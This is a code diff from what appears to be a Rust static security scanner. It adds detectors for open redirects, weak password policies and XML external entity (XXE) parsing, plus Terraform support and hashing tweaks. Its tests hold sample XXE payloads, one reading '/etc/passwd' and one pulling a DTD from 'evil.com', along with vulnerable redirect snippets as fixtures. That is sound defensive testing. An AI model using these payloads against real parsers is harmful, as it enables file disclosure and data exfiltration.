let content = r#"const TLS_MIN_VERSION = "1.2";"#;
let claims = extractor.extract(&["rust".to_string()], content, Language::Rust, "src/config.rs");
// TLS 1.2 is safe, should not match semantic pattern
assert!(claims.is_empty());
}
#[test]
fn test_no_false_positive_env_tls13() {
let extractor = TlsVersionExtractor::new();
let content = "TLS_VERSION=1.3";
let claims = extractor.extract(&["env".to_string()], content, Language::Dotenv, ".env");
// TLS 1.3 is safe, should not match
assert!(claims.is_empty());
}
#[test]
fn test_no_false_positive_terraform_tls12() {
let extractor = TlsVersionExtractor::new();
let content = r#"min_tls_version = "TLS1_2""#;
let claims =
extractor.extract(&["terraform".to_string()], content, Language::Terraform, "main.tf");
// TLS 1.2 is safe
assert!(claims.is_empty());
}
#[test]
fn test_no_false_positive_k8s_tls12() {
let extractor = TlsVersionExtractor::new();
let content = r#"minTLSVersion: VersionTLS12"#;
let claims =
extractor.extract(&["k8s".to_string()], content, Language::Yaml, "deployment.yaml");
// TLS 1.2 is safe
assert!(claims.is_empty());
}

View File

@ -0,0 +1,301 @@
//! Unvalidated redirects vulnerability extractor.
//!
//! Detects patterns where HTTP redirects use user-controlled input
//! without proper validation, which can lead to open redirect attacks.
use regex::Regex;
use stemedb_core::types::ObjectValue;
use super::traits::{build_claim, Extractor};
use crate::types::{ExtractedClaim, Language};
/// Extractor for unvalidated redirect vulnerabilities.
///
/// Detects patterns indicating unsafe redirect handling:
/// - redirect() with user-controlled URLs
/// - window.location assignment with user input
/// - URL parameters named redirect/return/next/goto
pub struct UnvalidatedRedirectsExtractor {
// Python patterns
python_redirect: Regex,
python_flask_redirect: Regex,
// JavaScript/TypeScript patterns
js_redirect: Regex,
js_location: Regex,
// Go patterns
go_redirect: Regex,
// Universal URL parameter patterns
url_param: Regex,
}
impl Default for UnvalidatedRedirectsExtractor {
fn default() -> Self {
Self::new()
}
}
impl UnvalidatedRedirectsExtractor {
/// Create a new unvalidated redirects extractor with compiled regexes.
///
/// # Panics
/// Panics if any regex pattern is invalid (programmer error).
#[allow(clippy::expect_used)]
pub fn new() -> Self {
Self {
// Python: redirect with user input
python_redirect: Regex::new(
r#"(?:redirect|HttpResponseRedirect)\s*\(\s*(?:request\.(?:GET|POST|args)|url|next|return_url)"#,
)
.expect("valid regex"),
python_flask_redirect: Regex::new(
r#"redirect\s*\(\s*request\.(?:args|form)\.get\s*\("#,
)
.expect("valid regex"),
// JavaScript: redirect with user input
js_redirect: Regex::new(
r#"res\.redirect\s*\(\s*(?:req\.(?:query|params|body)\.|url|next)"#,
)
.expect("valid regex"),
js_location: Regex::new(
r#"(?:window\.)?location(?:\.href)?\s*=\s*(?:url|params|query|req\.)"#,
)
.expect("valid regex"),
// Go: http.Redirect with user input
go_redirect: Regex::new(
r#"http\.Redirect\s*\([^,]*,\s*[^,]*,\s*(?:r\.|req\.|c\.)"#,
)
.expect("valid regex"),
// Universal: dangerous URL parameter patterns
url_param: Regex::new(
r#"(?i)(?:redirect|return|next|goto|url|continue)(?:_url|Uri|_to)?\s*[:=]\s*(?:req\.|request\.|params\.)"#,
)
.expect("valid regex"),
}
}
fn make_claim(
path_segments: &[String],
file: &str,
line: usize,
matched: &str,
category: &str,
description: &str,
) -> ExtractedClaim {
build_claim(
path_segments,
&["http", "redirect", category],
"redirect_source",
ObjectValue::Text("user_controlled".to_string()),
file,
line,
matched,
0.85,
description,
)
}
}
impl Extractor for UnvalidatedRedirectsExtractor {
fn name(&self) -> &str {
"unvalidated_redirects"
}
fn languages(&self) -> &[Language] {
&[Language::Python, Language::JavaScript, Language::TypeScript, Language::Go]
}
fn extract(
&self,
path_segments: &[String],
content: &str,
language: Language,
file: &str,
) -> Vec<ExtractedClaim> {
let mut claims = Vec::new();
for (line_idx, line) in content.lines().enumerate() {
let line_num = line_idx + 1;
// Check for dangerous URL parameter patterns (all languages)
if let Some(m) = self.url_param.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"url_parameter",
"Redirect URL from user-controlled parameter (open redirect risk)",
));
}
// Language-specific patterns
match language {
Language::Python => {
if let Some(m) = self.python_redirect.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"response",
"Redirect with user-controlled URL (open redirect risk)",
));
}
if let Some(m) = self.python_flask_redirect.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"response",
"Flask redirect with request parameter (open redirect risk)",
));
}
}
Language::JavaScript | Language::TypeScript => {
if let Some(m) = self.js_redirect.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"response",
"res.redirect with user input (open redirect risk)",
));
}
if let Some(m) = self.js_location.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"client_side",
"window.location assignment with user input (open redirect risk)",
));
}
}
Language::Go => {
if let Some(m) = self.go_redirect.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"response",
"http.Redirect with user input (open redirect risk)",
));
}
}
_ => {}
}
}
claims
}
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn test_python_redirect() {
let extractor = UnvalidatedRedirectsExtractor::new();
let content = r#"
return redirect(request.GET['next'])
"#;
let claims =
extractor.extract(&["python".to_string()], content, Language::Python, "views.py");
assert_eq!(claims.len(), 1);
assert!(claims[0].concept_path.contains("http/redirect"));
}
#[test]
fn test_python_flask_redirect() {
let extractor = UnvalidatedRedirectsExtractor::new();
let content = r#"
return redirect(request.form.get('destination'))
"#;
let claims =
extractor.extract(&["python".to_string()], content, Language::Python, "app.py");
// Should match the flask redirect pattern (redirect + request.form.get)
assert_eq!(claims.len(), 1);
}
#[test]
fn test_js_redirect() {
let extractor = UnvalidatedRedirectsExtractor::new();
let content = r#"
res.redirect(req.query.next);
"#;
let claims =
extractor.extract(&["js".to_string()], content, Language::JavaScript, "app.js");
assert_eq!(claims.len(), 1);
}
#[test]
fn test_js_location() {
let extractor = UnvalidatedRedirectsExtractor::new();
let content = r#"
window.location = url;
"#;
let claims =
extractor.extract(&["js".to_string()], content, Language::JavaScript, "app.js");
assert_eq!(claims.len(), 1);
assert!(claims[0].description.contains("window.location"));
}
#[test]
fn test_go_redirect() {
let extractor = UnvalidatedRedirectsExtractor::new();
let content = r#"
http.Redirect(w, r, r.URL.Query().Get("next"), http.StatusFound)
"#;
let claims = extractor.extract(&["go".to_string()], content, Language::Go, "handler.go");
assert_eq!(claims.len(), 1);
}
#[test]
fn test_url_param_pattern() {
let extractor = UnvalidatedRedirectsExtractor::new();
let content = r#"
redirect_url = request.args.get("redirect")
"#;
let claims =
extractor.extract(&["python".to_string()], content, Language::Python, "handler.py");
// Should match the url_param pattern (redirect_url = request.)
assert_eq!(claims.len(), 1);
}
#[test]
fn test_no_false_positives_static_redirect() {
let extractor = UnvalidatedRedirectsExtractor::new();
// Safe: static redirect URL
let content = r#"
res.redirect('/login');
"#;
let claims =
extractor.extract(&["js".to_string()], content, Language::JavaScript, "app.js");
assert!(claims.is_empty());
}
}

View File

@ -0,0 +1,344 @@
//! Weak password requirements extractor.
//!
//! Detects patterns where password policies are too weak,
//! such as minimum length < 8, bcrypt cost < 10, or missing complexity requirements.
use regex::Regex;
use stemedb_core::types::ObjectValue;
use super::traits::{build_claim, Extractor};
use crate::types::{ExtractedClaim, Language};
/// Extractor for weak password requirement configurations.
///
/// Detects patterns indicating insufficient password policies:
/// - Minimum password length < 8 characters
/// - Bcrypt cost/rounds < 10
/// - Complexity requirements disabled
pub struct WeakPasswordExtractor {
// Minimum length too short (< 8)
min_length_weak: Regex,
min_length_config: Regex,
// Bcrypt cost too low (< 10)
bcrypt_weak: Regex,
// Simple length check in code
simple_check: Regex,
// Special chars not required
no_special: Regex,
no_uppercase: Regex,
no_number: Regex,
}
impl Default for WeakPasswordExtractor {
fn default() -> Self {
Self::new()
}
}
impl WeakPasswordExtractor {
/// Create a new weak password extractor with compiled regexes.
///
/// # Panics
/// Panics if any regex pattern is invalid (programmer error).
#[allow(clippy::expect_used)]
pub fn new() -> Self {
Self {
// Minimum length too short (< 8) in various config formats
min_length_weak: Regex::new(
r#"(?i)(?:min[_-]?(?:password[_-]?)?length|password[_-]?min(?:[_-]?length)?)\s*[:=]\s*[1-7](?:\D|$)"#,
)
.expect("valid regex"),
min_length_config: Regex::new(
r#"(?i)["']?(?:minLength|min_length|minimumLength)["']?\s*[:=]\s*[1-7](?:\D|$)"#,
)
.expect("valid regex"),
// Bcrypt cost too low (< 10)
bcrypt_weak: Regex::new(
r#"(?i)(?:bcrypt|hash|argon2?|scrypt).*(?:cost|rounds|iterations)\s*[:=]\s*[1-9](?:\D|$)"#,
)
.expect("valid regex"),
// Simple length check in code (checking for < 8)
simple_check: Regex::new(
r#"len\s*\(\s*password\s*\)\s*(?:>=?|>)\s*[1-7](?:\D|$)"#,
)
.expect("valid regex"),
// Complexity requirements disabled
no_special: Regex::new(
r#"(?i)require[_-]?(?:special|symbol)[_-]?(?:char)?s?\s*[:=]\s*(?:false|no|0)"#,
)
.expect("valid regex"),
no_uppercase: Regex::new(
r#"(?i)require[_-]?(?:upper|uppercase)[_-]?(?:case)?\s*[:=]\s*(?:false|no|0)"#,
)
.expect("valid regex"),
no_number: Regex::new(
r#"(?i)require[_-]?(?:number|digit)s?\s*[:=]\s*(?:false|no|0)"#,
)
.expect("valid regex"),
}
}
fn make_claim(
path_segments: &[String],
file: &str,
line: usize,
matched: &str,
category: &str,
value: ObjectValue,
description: &str,
) -> ExtractedClaim {
build_claim(
path_segments,
&["auth", "password", "policy", category],
"requirement_strength",
value,
file,
line,
matched,
0.9,
description,
)
}
}
impl Extractor for WeakPasswordExtractor {
fn name(&self) -> &str {
"weak_password"
}
fn languages(&self) -> &[Language] {
&[
Language::Python,
Language::JavaScript,
Language::TypeScript,
Language::Go,
Language::Rust,
Language::Yaml,
Language::Json,
Language::Toml,
]
}
fn extract(
&self,
path_segments: &[String],
content: &str,
_language: Language,
file: &str,
) -> Vec<ExtractedClaim> {
let mut claims = Vec::new();
for (line_idx, line) in content.lines().enumerate() {
let line_num = line_idx + 1;
// Check for weak minimum length
if let Some(m) = self.min_length_weak.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"min_length",
ObjectValue::Text("weak".to_string()),
"Minimum password length < 8 characters (should be at least 8)",
));
}
if let Some(m) = self.min_length_config.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"min_length",
ObjectValue::Text("weak".to_string()),
"Minimum password length < 8 characters (should be at least 8)",
));
}
// Check for weak bcrypt cost
if let Some(m) = self.bcrypt_weak.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"hash_cost",
ObjectValue::Text("weak".to_string()),
"Password hashing cost/rounds < 10 (should be at least 10 for bcrypt)",
));
}
// Check for simple length validation
if let Some(m) = self.simple_check.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"validation",
ObjectValue::Text("weak".to_string()),
"Password validation allows < 8 characters",
));
}
// Check for disabled complexity requirements
if let Some(m) = self.no_special.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"complexity",
ObjectValue::Boolean(false),
"Special character requirement disabled",
));
}
if let Some(m) = self.no_uppercase.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"complexity",
ObjectValue::Boolean(false),
"Uppercase requirement disabled",
));
}
if let Some(m) = self.no_number.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"complexity",
ObjectValue::Boolean(false),
"Number/digit requirement disabled",
));
}
}
claims
}
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn test_weak_min_length_yaml() {
let extractor = WeakPasswordExtractor::new();
let content = r#"
password_min: 6
"#;
let claims =
extractor.extract(&["config".to_string()], content, Language::Yaml, "auth.yaml");
// Should match min_length_weak pattern
assert_eq!(claims.len(), 1);
assert!(claims[0].concept_path.contains("auth/password/policy"));
}
#[test]
fn test_weak_min_length_json() {
let extractor = WeakPasswordExtractor::new();
let content = r#"
"minLength": 4
"#;
let claims =
extractor.extract(&["config".to_string()], content, Language::Json, "config.json");
assert_eq!(claims.len(), 1);
}
#[test]
fn test_weak_bcrypt_cost() {
let extractor = WeakPasswordExtractor::new();
let content = r#"
bcrypt_cost = 8
"#;
let claims =
extractor.extract(&["config".to_string()], content, Language::Toml, "config.toml");
assert_eq!(claims.len(), 1);
assert!(claims[0].description.contains("cost/rounds"));
}
#[test]
fn test_simple_length_check() {
let extractor = WeakPasswordExtractor::new();
let content = r#"
if len(password) >= 6:
"#;
let claims =
extractor.extract(&["python".to_string()], content, Language::Python, "auth.py");
assert_eq!(claims.len(), 1);
}
#[test]
fn test_no_special_chars() {
let extractor = WeakPasswordExtractor::new();
let content = r#"
require_special_chars: false
"#;
let claims =
extractor.extract(&["config".to_string()], content, Language::Yaml, "auth.yaml");
assert_eq!(claims.len(), 1);
assert!(claims[0].description.contains("Special character"));
}
#[test]
fn test_no_uppercase() {
let extractor = WeakPasswordExtractor::new();
let content = r#"
require_uppercase = false
"#;
let claims =
extractor.extract(&["config".to_string()], content, Language::Toml, "config.toml");
assert_eq!(claims.len(), 1);
}
#[test]
fn test_no_false_positives_strong() {
let extractor = WeakPasswordExtractor::new();
// Strong: min length >= 8
let content = r#"
password_min_length: 12
bcrypt_cost: 12
"#;
let claims =
extractor.extract(&["config".to_string()], content, Language::Yaml, "auth.yaml");
assert!(claims.is_empty());
}
#[test]
fn test_boundary_value_8() {
let extractor = WeakPasswordExtractor::new();
// Boundary: exactly 8 should be OK
let content = r#"
password_min_length: 8
"#;
let claims =
extractor.extract(&["config".to_string()], content, Language::Yaml, "auth.yaml");
assert!(claims.is_empty());
}
}

View File

@ -0,0 +1,432 @@
//! XML External Entity (XXE) vulnerability extractor.
//!
//! Detects patterns where XML parsers are used without disabling external entity
//! processing, which can lead to data exfiltration, SSRF, or denial of service.
use regex::Regex;
use stemedb_core::types::ObjectValue;
use super::traits::{build_claim, Extractor};
use crate::types::{ExtractedClaim, Language};
/// Extractor for XXE vulnerabilities.
///
/// Detects patterns indicating potentially unsafe XML parsing:
/// - Python: lxml, xml.etree, xml.dom.minidom, xml.sax
/// - JavaScript: xml2js, libxmljs
/// - Go: encoding/xml
/// - Java-style patterns (polyglot detection)
/// - DTD entity declarations
pub struct XxeExtractor {
// Python patterns
python_lxml: Regex,
python_etree: Regex,
python_minidom: Regex,
python_sax: Regex,
// JavaScript patterns
js_xml2js: Regex,
js_libxmljs: Regex,
// Go patterns
go_xml: Regex,
// Java-style patterns
java_xxe: Regex,
// DTD entity declaration
entity_decl: Regex,
}
impl Default for XxeExtractor {
fn default() -> Self {
Self::new()
}
}
impl XxeExtractor {
/// Create a new XXE extractor with compiled regexes.
///
/// # Panics
/// Panics if any regex pattern is invalid (programmer error).
#[allow(clippy::expect_used)]
pub fn new() -> Self {
Self {
// Python: lxml/etree parse
python_lxml: Regex::new(r#"(?:etree|lxml)\.(?:parse|fromstring|XML)\s*\("#)
.expect("valid regex"),
// Python: xml.etree.ElementTree
python_etree: Regex::new(
r#"(?:xml\.etree\.ElementTree|ET)\.(?:parse|fromstring|XMLParser)\s*\("#,
)
.expect("valid regex"),
// Python: xml.dom.minidom
python_minidom: Regex::new(r#"xml\.dom\.minidom\.(?:parse|parseString)\s*\("#)
.expect("valid regex"),
// Python: xml.sax
python_sax: Regex::new(r#"xml\.sax\.(?:parse|parseString|make_parser)\s*\("#)
.expect("valid regex"),
// JavaScript: xml2js
js_xml2js: Regex::new(r#"xml2js\.(?:parseString|Parser)\s*\("#).expect("valid regex"),
// JavaScript: libxmljs
js_libxmljs: Regex::new(r#"libxmljs\.parseXml\s*\("#).expect("valid regex"),
// Go: encoding/xml
go_xml: Regex::new(r#"xml\.(?:Unmarshal|NewDecoder)\s*\("#).expect("valid regex"),
// Java-style patterns (polyglot detection in config files, etc.)
java_xxe: Regex::new(
r#"(?:DocumentBuilder|SAXParser|XMLReader|TransformerFactory)(?:Factory)?\.new"#,
)
.expect("valid regex"),
// DTD entity declaration (dangerous in untrusted XML)
entity_decl: Regex::new(r#"<!ENTITY\s+(?:%\s+)?\w+\s+(?:SYSTEM|PUBLIC)"#)
.expect("valid regex"),
}
}
fn make_claim(
path_segments: &[String],
file: &str,
line: usize,
matched: &str,
parser: &str,
confidence: f32,
description: &str,
) -> ExtractedClaim {
build_claim(
path_segments,
&["xml", "parsing"],
"parser_config",
ObjectValue::Text(parser.to_string()),
file,
line,
matched,
confidence,
description,
)
}
}
impl Extractor for XxeExtractor {
fn name(&self) -> &str {
"xxe"
}
fn languages(&self) -> &[Language] {
&[Language::Python, Language::JavaScript, Language::TypeScript, Language::Go]
}
fn extract(
&self,
path_segments: &[String],
content: &str,
language: Language,
file: &str,
) -> Vec<ExtractedClaim> {
let mut claims = Vec::new();
for (line_idx, line) in content.lines().enumerate() {
let line_num = line_idx + 1;
// Check for DTD entity declarations (high risk in any context)
if let Some(m) = self.entity_decl.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"dtd_entity",
0.95,
"DTD SYSTEM/PUBLIC entity declaration (XXE attack vector)",
));
}
match language {
Language::Python => {
// lxml/etree (can be safe with proper configuration)
if let Some(m) = self.python_lxml.find(line) {
// Lower confidence if defusedxml is imported or resolve_entities=False
let confidence = if content.contains("defusedxml")
|| line.contains("resolve_entities=False")
{
0.5
} else {
0.85
};
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"lxml",
confidence,
"lxml XML parsing may be vulnerable to XXE without proper config",
));
}
// xml.etree.ElementTree
if let Some(m) = self.python_etree.find(line) {
// Python 3.8+ has some protections, but external entities still a concern
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"elementtree",
0.75,
"xml.etree.ElementTree may allow external entity expansion",
));
}
// xml.dom.minidom (vulnerable by default)
if let Some(m) = self.python_minidom.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"minidom",
0.85,
"xml.dom.minidom is vulnerable to XXE attacks",
));
}
// xml.sax (needs feature flags to be safe)
if let Some(m) = self.python_sax.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"sax",
0.85,
"xml.sax is vulnerable to XXE without feature_external_ges=False",
));
}
}
Language::JavaScript | Language::TypeScript => {
// xml2js (generally safer, but can be misconfigured)
if let Some(m) = self.js_xml2js.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"xml2js",
0.7,
"xml2js XML parsing - verify external entity settings",
));
}
// libxmljs (can be vulnerable)
if let Some(m) = self.js_libxmljs.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"libxmljs",
0.85,
"libxmljs may be vulnerable to XXE attacks",
));
}
}
Language::Go => {
// encoding/xml (safer by default, but DTD expansion can be issue)
if let Some(m) = self.go_xml.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"encoding_xml",
0.65,
"Go xml package - generally safe but verify with untrusted input",
));
}
}
_ => {}
}
// Check for Java patterns (polyglot detection)
if let Some(m) = self.java_xxe.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"java_parser",
0.9,
"Java XML parser - requires feature flags to prevent XXE",
));
}
}
claims
}
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn test_python_lxml() {
let extractor = XxeExtractor::new();
let content = r#"
doc = etree.parse(xml_file)
"#;
let claims =
extractor.extract(&["python".to_string()], content, Language::Python, "parser.py");
assert_eq!(claims.len(), 1);
assert!(claims[0].concept_path.contains("xml/parsing"));
}
#[test]
fn test_python_lxml_with_defusedxml() {
let extractor = XxeExtractor::new();
let content = r#"
import defusedxml.ElementTree as ET
doc = etree.parse(xml_file)
"#;
let claims =
extractor.extract(&["python".to_string()], content, Language::Python, "parser.py");
// Should still detect but with lower confidence
assert_eq!(claims.len(), 1);
assert!(claims[0].confidence < 0.6);
}
#[test]
fn test_python_elementtree() {
let extractor = XxeExtractor::new();
let content = r#"
import xml.etree.ElementTree as ET
tree = ET.parse(source)
"#;
let claims =
extractor.extract(&["python".to_string()], content, Language::Python, "xml.py");
assert_eq!(claims.len(), 1);
}
#[test]
fn test_python_minidom() {
let extractor = XxeExtractor::new();
let content = r#"
from xml.dom.minidom import parse
doc = xml.dom.minidom.parse(xml_string)
"#;
let claims =
extractor.extract(&["python".to_string()], content, Language::Python, "parser.py");
assert_eq!(claims.len(), 1);
assert!(claims[0].description.contains("minidom"));
}
#[test]
fn test_python_sax() {
let extractor = XxeExtractor::new();
let content = r#"
xml.sax.parse(source, handler)
"#;
let claims =
extractor.extract(&["python".to_string()], content, Language::Python, "handler.py");
assert_eq!(claims.len(), 1);
}
#[test]
fn test_js_xml2js() {
let extractor = XxeExtractor::new();
let content = r#"
xml2js.parseString(xmlData, callback);
"#;
let claims =
extractor.extract(&["js".to_string()], content, Language::JavaScript, "parser.js");
assert_eq!(claims.len(), 1);
}
#[test]
fn test_js_libxmljs() {
let extractor = XxeExtractor::new();
let content = r#"
const doc = libxmljs.parseXml(xmlString);
"#;
let claims =
extractor.extract(&["js".to_string()], content, Language::JavaScript, "parser.js");
assert_eq!(claims.len(), 1);
}
#[test]
fn test_go_xml() {
let extractor = XxeExtractor::new();
let content = r#"
err := xml.Unmarshal(data, &result)
"#;
let claims = extractor.extract(&["go".to_string()], content, Language::Go, "parser.go");
assert_eq!(claims.len(), 1);
}
#[test]
fn test_java_parser() {
let extractor = XxeExtractor::new();
let content = r#"
DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
"#;
let claims =
extractor.extract(&["python".to_string()], content, Language::Python, "mixed.py");
assert_eq!(claims.len(), 1);
assert!(claims[0].description.contains("Java"));
}
#[test]
fn test_dtd_entity() {
let extractor = XxeExtractor::new();
let content = r#"
<!ENTITY xxe SYSTEM "file:///etc/passwd">
"#;
// Use a non-test filename to avoid confidence reduction
let claims =
extractor.extract(&["python".to_string()], content, Language::Python, "parser.xml");
assert_eq!(claims.len(), 1);
assert!(claims[0].confidence >= 0.9);
assert!(claims[0].description.contains("XXE attack vector"));
}
#[test]
fn test_dtd_public_entity() {
let extractor = XxeExtractor::new();
let content = r#"
<!ENTITY % remote PUBLIC "http://evil.com/evil.dtd">
"#;
let claims =
extractor.extract(&["python".to_string()], content, Language::Python, "test.xml");
assert_eq!(claims.len(), 1);
}
}

View File

@ -61,6 +61,7 @@ pub fn language_to_prefix(language: Language) -> &'static str {
Language::GoMod => "gomod",
Language::NpmManifest => "npm",
Language::PythonManifest => "python",
Language::Terraform => "terraform",
Language::Unknown => "unknown",
}
}
@ -84,6 +85,7 @@ pub fn language_to_name(language: Language) -> &'static str {
Language::GoMod => "Go module",
Language::NpmManifest => "NPM manifest",
Language::PythonManifest => "Python manifest",
Language::Terraform => "Terraform",
Language::Unknown => "Unknown",
}
}
@ -107,6 +109,7 @@ pub fn language_to_extension(language: Language) -> &'static str {
Language::GoMod => "go",
Language::NpmManifest => "json",
Language::PythonManifest => "toml",
Language::Terraform => "hcl",
Language::Unknown => "",
}
}

View File

@ -244,6 +244,7 @@ fn language_to_string(lang: Language) -> String {
Language::GoMod => "gomod",
Language::NpmManifest => "npm",
Language::PythonManifest => "pip",
Language::Terraform => "terraform",
Language::Unknown => "unknown",
}
.to_string()

View File

@ -34,6 +34,8 @@ pub enum Language {
Dotenv,
/// Docker files.
Docker,
/// Terraform files.
Terraform,
/// Cargo manifest.
CargoManifest,
/// Go module file.
@ -62,6 +64,7 @@ impl fmt::Display for Language {
Language::Ini => "ini",
Language::Dotenv => "dotenv",
Language::Docker => "docker",
Language::Terraform => "terraform",
Language::CargoManifest => "cargo",
Language::GoMod => "gomod",
Language::NpmManifest => "npm",
@ -90,6 +93,7 @@ impl FromStr for Language {
"ini" => Ok(Language::Ini),
"dotenv" | "env" => Ok(Language::Dotenv),
"docker" | "dockerfile" => Ok(Language::Docker),
"terraform" | "tf" => Ok(Language::Terraform),
"cargo" | "cargo.toml" => Ok(Language::CargoManifest),
"gomod" | "go.mod" => Ok(Language::GoMod),
"npm" | "package.json" => Ok(Language::NpmManifest),
@ -153,6 +157,7 @@ impl Language {
"toml" => Language::Toml,
"json" => Language::Json,
"ini" => Language::Ini,
"tf" => Language::Terraform,
_ => Language::Unknown,
}
}
@ -174,6 +179,8 @@ mod tests {
assert_eq!(Language::from_path(Path::new("go.mod")), Language::GoMod);
assert_eq!(Language::from_path(Path::new(".env.production")), Language::Dotenv);
assert_eq!(Language::from_path(Path::new("Dockerfile")), Language::Docker);
assert_eq!(Language::from_path(Path::new("main.tf")), Language::Terraform);
assert_eq!(Language::from_path(Path::new("variables.tf")), Language::Terraform);
}
#[test]
@ -201,6 +208,8 @@ mod tests {
assert_eq!(Language::from_str("gomod").unwrap(), Language::GoMod);
assert_eq!(Language::from_str("npm").unwrap(), Language::NpmManifest);
assert_eq!(Language::from_str("pip").unwrap(), Language::PythonManifest);
assert_eq!(Language::from_str("terraform").unwrap(), Language::Terraform);
assert_eq!(Language::from_str("tf").unwrap(), Language::Terraform);
}
#[test]

View File

@ -24,7 +24,7 @@ pub use verdict::Verdict;
/// # Example
///
/// ```
/// use aphoria::types::PredicateAliasSet;
/// use aphoria::PredicateAliasSet;
///
/// let aliases = PredicateAliasSet::new("enabled", vec!["required", "mandatory"]);
/// assert!(aliases.contains("enabled"));

View File

@ -37,7 +37,11 @@ impl PathMapper {
Language::JavaScript | Language::NpmManifest => "javascript",
Language::Cpp => "cpp",
Language::Ini => "config",
Language::Yaml | Language::Toml | Language::Json | Language::Dotenv => "config",
Language::Yaml
| Language::Toml
| Language::Json
| Language::Dotenv
| Language::Terraform => "config",
Language::Docker => "docker",
Language::Unknown => "unknown",
};

View File

@ -60,7 +60,13 @@ pub fn compute_content_hash_v2(assertion: &Assertion) -> [u8; 32] {
}
ObjectValue::Number(n) => {
hasher.update(b"N:");
hasher.update(&n.to_le_bytes());
// Round to 10 decimal places for reproducibility across JSON round-trips.
// JSON serialization/deserialization can change the exact f64 bit pattern
// for numbers that aren't exactly representable in decimal.
// 10 decimal places is more than enough for real-world values while
// surviving the decimal→binary→decimal conversion in JSON parsing.
let s = format!("{:.10}", n);
hasher.update(s.as_bytes());
}
ObjectValue::Boolean(b) => {
hasher.update(b"B:");
@ -79,8 +85,11 @@ pub fn compute_content_hash_v2(assertion: &Assertion) -> [u8; 32] {
hasher.update(&(assertion.source_class as u8).to_le_bytes());
// Confidence and timestamp
// Use string format for confidence (f32) to survive JSON round-trips.
// f32 has ~7 significant decimal digits, so 6 decimal places is sufficient.
hasher.update(b":");
hasher.update(&assertion.confidence.to_le_bytes());
let confidence_str = format!("{:.6}", assertion.confidence);
hasher.update(confidence_str.as_bytes());
hasher.update(b":");
hasher.update(&assertion.timestamp.to_le_bytes());

View File

@ -1,7 +1,5 @@
//! Record processing methods for the IngestWorker.
//!
//! Contains methods for ingesting assertions, votes, and epochs,
//! including validation and signature verification.
//! Record processing methods for the IngestWorker. Ingests assertions, votes,
//! and epochs with validation and signature verification.
use super::record_types::RECORD_HEADER_SIZE;
use super::{IngestWorker, RecordType};
@ -327,12 +325,20 @@ impl<S: KVStore + 'static> IngestWorker<S> {
// The hash covers: subject, predicate, object, source_hash, source_class, confidence, timestamp.
let v2_content_hash: Option<[u8; 32]> =
if assertion.signatures.iter().any(|s| s.version == 2) {
// Debug: show exact number format for comparison with signing
let object_str = match &assertion.object {
stemedb_core::types::ObjectValue::Number(n) => format!("Number({:.17})", n),
other => format!("{:?}", other),
};
let confidence_str = format!("{:.17}", assertion.confidence);
let hash = compute_content_hash_v2(assertion);
debug!(
subject = %assertion.subject,
predicate = %assertion.predicate,
object = %object_str,
source_hash = %hex::encode(assertion.source_hash),
source_class = ?assertion.source_class,
confidence = %assertion.confidence,
confidence = %confidence_str,
timestamp = %assertion.timestamp,
content_hash = %hex::encode(hash),
"Computed v2 content hash for verification"

View File

@ -0,0 +1,177 @@
# stemedb-ontology
Domain Ontology Layer for Episteme - defines how subjects are structured based on predicate type and domain. Ensures conflicts collide correctly when different sources report on the same thing.
## Module Overview
| Module | Purpose |
|--------|---------|
| `domain.rs` | Domain, EntityType, PredicateSchema, SourceTier builders |
| `subject.rs` | SubjectBuilder for canonical subject construction |
| `validator.rs` | Validates assertions against domain rules |
| `client.rs` | HTTP client for StemeDB API |
| `dto/` | Request/response DTOs for API communication |
| `pharma/` | Pharmaceutical domain (reference implementation) |
## Quick Start
### CLI Usage (steme-pharma)
```bash
# Build the CLI
cargo build --release -p stemedb-ontology
# Ingest FDA label data
./target/release/steme-pharma ingest semaglutide,tirzepatide
# Ingest with mock conflicts for testing
./target/release/steme-pharma ingest semaglutide --with-conflicts
# Query conflicts (Skeptic lens - default)
./target/release/steme-pharma query "Semaglutide:Type2Diabetes" hba1c_reduction_percent
# Query with source hierarchy (Layered Consensus)
./target/release/steme-pharma query "Semaglutide:Type2Diabetes" weight_loss_percent --mode layered
# Compare two drugs
./target/release/steme-pharma compare \
"Semaglutide:Type2Diabetes" \
"Tirzepatide:Type2Diabetes" \
--predicate hba1c_reduction_percent
# Explore available predicates for a subject
./target/release/steme-pharma explore "Semaglutide:Type2Diabetes"
# Validate a subject/predicate combination
./target/release/steme-pharma validate "Semaglutide:Type2Diabetes" hba1c_reduction_percent
# JSON output (for scripting)
./target/release/steme-pharma --format json query "Semaglutide" nausea_rate
```
### Programmatic Usage
```rust
use stemedb_ontology::{pharma, SubjectBuilder, Validator};
use stemedb_ontology::client::StemeClient;
